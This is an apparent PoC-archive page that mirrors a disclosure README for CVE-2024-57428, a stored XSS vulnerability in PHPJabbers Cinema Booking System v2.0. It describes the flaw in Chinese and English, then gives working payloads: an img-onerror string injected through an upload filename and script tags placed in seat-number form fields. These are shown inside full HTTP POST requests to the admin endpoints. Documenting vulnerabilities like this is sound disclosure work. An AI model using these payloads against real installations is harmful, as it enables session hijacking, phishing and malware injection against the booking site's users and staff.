关联漏洞
标题:
N/A
(CVE-2024-57428)
描述:在PHPJabbers Cinema Booking System v2.0中,由于文件上传字段(event_img, seat_maps)和座位号配置(pjActionCreate中的number[new_X])的输入未经过滤,存在存储型跨站脚本(XSS)漏洞。攻击者可以注入持久性的JavaScript,导致钓鱼攻击、恶意软件注入和会话劫持。
描述
CVE-2024-57428: PHPJabbers Cinema Booking System v2.0 suffers from stored XSS, enabling persistent JavaScript injection for phishing and malware attacks.
介绍
# CVE-2024-57428
A stored cross-site scripting (XSS) vulnerability in PHPJabbers Cinema Booking System v2.0 exists due to unsanitized input in file upload fields (event_img, seat_maps) and seat number configurations (number[new_X] in pjActionCreate). Attackers can inject persistent JavaScript, leading to phishing, malware injection, and session hijacking.
Vulnerable Parameter: ```event_img``` and ```seat_maps's file name```
## Impact:
Stored XSS is more severe than reflective XSS, as it affects all users who access the injected content. It could be leveraged for persistent phishing attacks, session theft, or injecting malware onto a large user base.
## Exploit - Proof of Concept (POC)
### Stored Cross-Site Scripting (XSS)
### File Upload Stored XSS
Payload: ```\"><img src=a onerror=alert(1)>```
```
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\"><img src=a onerror=alert(1)>"
Content-Type: image/jpeg
```
### CINEMA HALL SEAT NUMBER
Payload: ```"><script>alert(x)</script>```
```
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2
```
文件快照
[4.0K] /data/pocs/eb7cdb820ca7f7b679bebe1ae85a939a6ab90b92
└── [1.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。